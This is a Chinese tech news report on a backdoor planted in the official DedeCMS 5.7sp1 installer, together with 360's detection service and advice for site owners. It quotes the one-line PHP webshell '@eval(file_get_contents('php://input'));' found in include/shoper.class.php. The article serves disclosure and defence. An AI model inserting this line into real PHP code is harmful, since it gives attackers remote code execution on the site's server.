【IT商業新聞網訊】日前,織夢內容管理系統(DedeCMS)遭烏云漏洞平臺曝光稱,DedeCMS 5.7sp1官方安裝包被黑客植入后門。經360安全檢測平臺檢測,該后門確實曾一度出現在織夢官網版本中。為此,360于當天緊急推出DedeCMS后門檢測服務,并已對大批中招網站發出郵件報警。
360網站安全檢測平臺服務網址:http://webscan.360.cn
圖1:DedeCms被植入的后門代碼
據悉,DedeCMS正廣泛應用于眾多企業網站、政府網站、高校網站及個人網站上,是國內用戶量最大的PHP類CMS系統。360安全工程師分析發現,此次DedeCMS曝出的后門名為"一句話后門",其惡意代碼存在于DedeCMS購物車類文件中,凡是調用該購物車類的文件均會觸發后門,從而導致整個網站甚至服務器遭黑客進一步控制。
360建議,使用DedeCMS的網站站長應立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));",如存在應刪除該行代碼,如不存在則證明沒有該"一句話后門"。
作為開源軟件,DedeCMS此次曝出后門并非個例。因為在國際上,Linux等多款著名的開源軟件也曾遭黑客植入后門。不過,烏云漏洞平臺公開的織夢官方郵件顯示,織夢開發團隊否認了產品曾被植入后門,但其官網上的DedeCMS版本在3月21日中午悄然進行了修改。
圖2:測試驗證PHP代碼可被DedeCMS后門執行
推薦閱讀
李開復在微博寫道:“O2O就是(1)幫助線上用戶發現和推薦消費場所,(2)為線下服務業帶來線上客流,(3)可以檢測效果,最好可以線上支付。美國的O2O往往是幫助已上線的商家拉顧客,但是中國線下商家一般對互聯網認知和接>>>詳細閱讀
本文標題:DedeCMS官方版本驚曝后門 360緊急推出安全檢測
地址:http://www.sdlzkt.com/a/guandian/yejie/20111230/161793.html
網友點評
精彩導讀
科技快報
品牌展示